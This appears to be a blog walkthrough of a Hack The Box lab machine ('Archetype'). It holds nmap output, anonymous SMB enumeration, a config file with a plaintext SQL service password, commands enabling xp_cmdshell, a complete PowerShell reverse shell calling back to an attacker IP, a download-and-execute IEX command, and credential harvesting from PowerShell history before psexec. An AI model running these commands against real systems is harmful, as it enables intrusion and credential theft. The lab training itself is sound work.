Lab - HackyHour0
HackyHour0 - Entry
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
o$ nmap -sC -sV 10.10.10.27
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-13 21:29 EST
Error #487: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!
(base) J:~ luo$ nmap -sC -sV 10.10.10.27
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-13 21:29 EST
Nmap scan report for 10.10.10.27
Host is up (0.031s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-11-06T18:53:07
|_Not valid after: 2050-11-06T18:53:07
|_ssl-date: 2020-11-14T03:48:04+00:00; +1h18m29s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h54m30s, deviation: 3h34m41s, median: 1h18m29s
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-11-13T19:47:59-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-14T03:47:56
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.01 seconds
$ nmap 10.10.10.27
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-13 21:32 EST
Nmap scan report for 10.10.10.27
Host is up (0.029s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
# use smbclient to list available shares.
smbclient -N -L \\\\10.10.10.27\\
# a share called backups.
smbclient -N -L \\\\10.10.10.27\\backup
# dtsConfig file, which is a config file used with SSIS.
# it contains a SQL connection string, containing credentials for the local Windows user ARCHETYPE\sql_svc.
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
# connecting to the SQL Server using Impacket's mssqlclient.py.
mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27 -windows-auth
# use the IS_SRVROLEMEMBER function to reveal whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. This is successful, and we do indeed have sysadmin privileges.
# This will allow us to enable xp_cmdshell and gain RCE on the host. Let's attempt this, by inputting the commands below.
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"
# The whoami command output reveals that the SQL Server is also running in the context of the user ARCHETYPE\sql_svc. However, this account doesn't seem to have administrative privileges on the host.
# to get a proper shell, and proceed to further enumerate the system.
# We can save the PowerShell reverse shell below as shell.ps1.
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# Next, stand up a mini webserver in order to host the file.
python3 -m http.server 80
# stand up netcat listener on port 443
# use ufw to allow the call backs on port 80 and 443 to machine.
nc -lvnp 443
ufw allow from 10.10.10.27 proto tcp to any port 80,443
# We can now issue the command to download and execute the reverse shell through xp_cmdshell.
xp_cmdshell powershell "IEX (New-Object Net.WebClient).DownloadString(\"https://10.10.14.3/shell.ps1\");"
# A shell is received as sql_svc, and we can get the user.txt on their desktop.
# As this is a normal user account as well as a service account, it is worth checking for frequently access files or executed commands.
# to access the PowerShell history file.
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
# This reveals that the backups drive has been mapped using the local administrator credentials.
# use Impacket's psexec.py to gain a privileged shell.
psexec.py administrator@10.10.10.27
# now access the flag on the administrator desktop
This post is licensed under CC BY 4.0 by the author.
Comments powered by Disqus.